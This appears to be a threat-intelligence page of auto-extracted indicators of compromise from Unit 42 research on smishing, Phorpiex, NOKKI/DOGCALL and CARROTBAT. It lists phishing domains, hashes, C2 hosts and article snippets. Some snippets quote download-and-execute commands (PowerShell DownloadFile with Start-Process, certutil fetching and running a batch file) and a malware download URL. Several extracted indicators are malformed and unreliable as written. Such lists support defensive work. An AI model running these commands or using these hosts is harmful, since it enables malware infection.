ZeroHour

Indicators of compromise

4,190 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domaingov-tax.icu-etczhh[.]cc utah.gov-etcfr[.]win irs.gov-tax[.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yioreThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domaingov-tosz.live[.]vip sunpass.com-hbg[.]vip usps.com-hzasr[.]bid e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.orgThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainid-39732.info.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet Crime Complaint Center (IC3The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainid-89b98.coment[.]info irs.gov-mo[.]net israeipost.co-ykk[.]vip canpost.id-89b98[.]com anpost.id-39732[.]info Additional Resources Internet CrimThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainil-363.com.]cfd irs.org.gov-tax[.]icu anpost.com-pay[.]online kveesh6.il-363[.]com dhl.de-yiore[.]store usps.com-posewxts[.]top e-zpass.com-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainirs.govnfo could trick people into thinking they are navigating to irs[.]gov . Figure 3 shows the most popular prefixes of domain nameThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-pvwh.xinky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gov-hzwy[.]live irs.govThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-qac.xin]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-mhmt[.]xin e-zpassny.gThe Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
domainorg-yga.xind e-zpassny.gov-tosz[.]live michigan.gov-imky[.]win e-zpass.org-yga[.]xin e-zpass.org-qac[.]xin ezpass.org-pvwh[.]xin ezpassnj.gov-The Smishing Deluge: China-Based Campaign Flooding Global Text Messages
Palo Alto Unit 42
· Aug 17, 2026
sha25601a96eeafb72042b3f69afd21b4c9155dbfe7f97ab3dca392972ad531a075ac26.54[.]109 194.76.227[.]94 206.189.229[.]43 Malware samples 01a96eeafb72042b3f69afd21b4c9155dbfe7f97ab3dca392972ad531a075ac2 9639f7ebc6a6d69d7bf5b8bc869e7783a1406088f192868624ad8919e9bAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha2569639f7ebc6a6d69d7bf5b8bc869e7783a1406088f192868624ad8919e9bfd1d4eeafb72042b3f69afd21b4c9155dbfe7f97ab3dca392972ad531a075ac2 9639f7ebc6a6d69d7bf5b8bc869e7783a1406088f192868624ad8919e9bfd1d4 bf24277400cc453d530e4277d3bd24e96c5e409adef6970518bdc59205aAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha256bf24277400cc453d530e4277d3bd24e96c5e409adef6970518bdc59205aa02417ebc6a6d69d7bf5b8bc869e7783a1406088f192868624ad8919e9bfd1d4 bf24277400cc453d530e4277d3bd24e96c5e409adef6970518bdc59205aa0241 e310476c41ae4f6e3c4ed9bb88303ee6e5e1455bd7afe51cf48965ea759Almost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha256cc43cdbe8eb9874f55fffbe23b560b673eb9f31fb9a953926bba29464fd2dd07characters Disassembly of associated malware samples (e.g., cc43cdbe8eb9874f55fffbe23b560b673eb9f31fb9a953926bba29464fd2dd07 ) confirms there are no hex-format IP addresses hard codedAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha256e310476c41ae4f6e3c4ed9bb88303ee6e5e1455bd7afe51cf48965ea7599e6e577400cc453d530e4277d3bd24e96c5e409adef6970518bdc59205aa0241 e310476c41ae4f6e3c4ed9bb88303ee6e5e1455bd7afe51cf48965ea7599e6e5 e3513922666c202c1ae5c06eea277ba10477868d6d89ce2819f4f8ff907Almost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha256e3513922666c202c1ae5c06eea277ba10477868d6d89ce2819f4f8ff9070bc8576c41ae4f6e3c4ed9bb88303ee6e5e1455bd7afe51cf48965ea7599e6e5 e3513922666c202c1ae5c06eea277ba10477868d6d89ce2819f4f8ff9070bc85 e5715e6611ef6bcb233f5d2098510dab3db408abbb728b00e1821bb2558Almost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
sha256e5715e6611ef6bcb233f5d2098510dab3db408abbb728b00e1821bb255829373922666c202c1ae5c06eea277ba10477868d6d89ce2819f4f8ff9070bc85 e5715e6611ef6bcb233f5d2098510dab3db408abbb728b00e1821bb255829373 A dditional Resources Phorpiex (Malware Family) – MalpediaAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
urlhttp://178.16.54[th several malware samples (e.g., the binary retrieved from hxxp[:]//178.16.54[.]109/st.exe ) associated with Phorpiex (aka Trik), a longAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· Aug 17, 2026
domainclinic.site. In this medical application, patients can use the API api.clinic[.]site/get_history?visit_id=XXXX to access the doctor visit noteHarnessing LLMs for Automating BOLA Detection
Palo Alto Unit 42
· Aug 17, 2026
domainnitesbr1.orgnload a VBScript file from the following URL: http:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html This VBScript file yet agaNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
md505d43d417a8f50e7b23246643fc7e03dAfter decryption, the following payload was identified: MD5 05d43d417a8f50e7b23246643fc7e03d SHA1 67c05b3937d94136eda4a60a2d5fb685abc776a1 SHA256 3fee06NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
md50f1d3ed85fee2acc23a8a26e0dc12e0ftion is provided after it is decrypted by the malware): MD5 0f1d3ed85fee2acc23a8a26e0dc12e0f SHA1 3d161de48d3f4da0aefff685253404c8b0111563 SHA256 fb94a5NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
md5a2fe5dcb08ae8b72e8bc98ddc0b918e7oject(20180108)\Final1stspy\LoadDll\Release\LoadDll.pdb MD5 a2fe5dcb08ae8b72e8bc98ddc0b918e7 SHA1 741dbdb20d1beeb8ff809291996c8b78585cb812 SHA256 0669c7NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
md5e02024f38dfb6290ce0d693539a285a9was identified. This file had the following properties: MD5 e02024f38dfb6290ce0d693539a285a9 SHA1 d13fc918433c705b49db74c91f56ae6c0cb5cf8d SHA256 66a0c2NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha13d161de48d3f4da0aefff685253404c8b0111563by the malware): MD5 0f1d3ed85fee2acc23a8a26e0dc12e0f SHA1 3d161de48d3f4da0aefff685253404c8b0111563 SHA256 fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha167c05b3937d94136eda4a60a2d5fb685abc776a1d was identified: MD5 05d43d417a8f50e7b23246643fc7e03d SHA1 67c05b3937d94136eda4a60a2d5fb685abc776a1 SHA256 3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967ebNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha1741dbdb20d1beeb8ff809291996c8b78585cb812lease\LoadDll.pdb MD5 a2fe5dcb08ae8b72e8bc98ddc0b918e7 SHA1 741dbdb20d1beeb8ff809291996c8b78585cb812 SHA256 0669c71740134323793429d10518576b42941f9eee0def6057edNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha1d13fc918433c705b49db74c91f56ae6c0cb5cf8dowing properties: MD5 e02024f38dfb6290ce0d693539a285a9 SHA1 d13fc918433c705b49db74c91f56ae6c0cb5cf8d SHA256 66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f0NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha2560669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9ab918e7 SHA1 741dbdb20d1beeb8ff809291996c8b78585cb812 SHA256 0669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9a File Type PE32 executable (DLL) (GUI) Intel 80386, for MS WNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha2563fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918fc7e03d SHA1 67c05b3937d94136eda4a60a2d5fb685abc776a1 SHA256 3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918f File Type PE32 executable (GUI) Intel 80386, for MS WindowsNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha25666a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51a285a9 SHA1 d13fc918433c705b49db74c91f56ae6c0cb5cf8d SHA256 66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51 Creator Windows User Created Date 2018-03-19 07:58:00 UTC LNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
sha256fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3ac12e0f SHA1 3d161de48d3f4da0aefff685253404c8b0111563 SHA256 fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3a File Type PE32 executable (GUI) Intel 80386, for MS WindowsNOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT
Palo Alto Unit 42
· Aug 17, 2026
domain000webhostapp.comct System . Net . WebClient ) . DownloadFile ( 'https://881.000webhostapp[.]com/0_31.doc' , '%TEMP%\\AAA.exe' ) ; Start - Process ( '%TEMThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domain000webhost.commmunication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observed the OceanSalt malwareThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domain1apps.com^ e ^ r ^ tutil - urlca ^ che - spl ^ it - f http : //s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit This commanThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbyethost10.comhosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning in June 2018, we observeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbyethost7.comwith the following hosts via FTP for C2 communication: ftp.byethost7[.]com ftp.byethost10[.]com files.000webhost[.]com Beginning inThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainbytehost31.orgongs to the SYSCON malware family. It communicates with ftp.bytehost31[.]org via FTP for command and control (C2). Figure 2 SYSCON netThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainnknews.orgarticle that was published on the same day as the attack by NKNews[.]org. The article in question discusses diplomatic ties betweeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainwebhost.combyethost7[.]com ftp.byethost10[.]com files.000webhost[.]com webhost[.]com 61.14.210[.]72:7117The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainwebmail-koryogroup.comcom/1.txt http://bluemountain.1apps[.]com/1.txt https://www.webmail-koryogroup[.]com/keep/1.txt http://filer1.1apps[.]com/1.txt ftp.byethost7[The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
domainyandex.rushing email was sent from the email address of yuri.sidorav@yandex[.]ru to a high ranking individual within a British governmentThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
md53e4015366126dcdbdcc8b5c508a6d25cs For the analysis below, the following sample is used: MD5 3e4015366126dcdbdcc8b5c508a6d25c SHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984 SHA256 aef92bThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
md5a943e196b83c4acd9c5ce13e4c43b4f4l The downloaded CAB file has the following properties: MD5 a943e196b83c4acd9c5ce13e4c43b4f4 SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd SHA256 cfe436The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha1e66e416f300c7efb90c383a7630c9cfe901ff9fdowing properties: MD5 a943e196b83c4acd9c5ce13e4c43b4f4 SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd SHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575beThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha1f459f9cfbd10b136cafb19cbc233a4c8342ad984g sample is used: MD5 3e4015366126dcdbdcc8b5c508a6d25c SHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984 SHA256 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e5The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2560490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b8c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf 0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b OceanSalt Payload Samples 59b023b30d8a76c5984fe62d2e751875bThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2560bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f2635840283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4 0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358 f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2561142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae 1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0 337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2561c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc 1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968 2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25622b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a 22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10 3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2562547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de 2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48 6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e52The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25626fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa 26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847 e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2562da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c481ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968 2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48 5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebadThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2562efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652 2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27 62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da502482The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27bcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0 337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b 92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2563663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29de8973ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2 3663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29de897 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9cThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2563869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980ddfa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10 3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2563cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b966057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97 3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25642e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876dede9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef 42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25659b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005a50e7ce4e092080d2f7db13ea0f88120b OceanSalt Payload Samples 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8aThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2565a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8bdf350d155b8e63d872a914581314aaa9c1dc SYSCON Payload Samples 5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a3703The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2565d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf0b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48 5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf 0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f8The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25662886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb725a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27 62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7 f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617aThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2566c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48 6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a 22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb5The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25670106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e229a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3 70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22 87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2567ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f26c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62 7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2 3663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2567cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b63b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005 7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6 fe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4fThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2567d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae27a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0 7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae 1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200dThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2567d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97d1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea 7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97 3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffeThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e319252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828 824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3 70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25687c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfcebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22 87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf3The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2568b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d 8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa 26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d9The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha25692b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62efc2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b 92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef 42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe506628The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha2569fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9de24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828 9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9 ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dcb2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc SYSCON Payload Samples 5a2c53a20fd66467e87290f5845a5c7d6aa8The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256a23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa68508843bd05287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63 a23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa68508843bd0 59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9cThe Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
sha256ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef288200The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia
Palo Alto Unit 42
· Aug 17, 2026
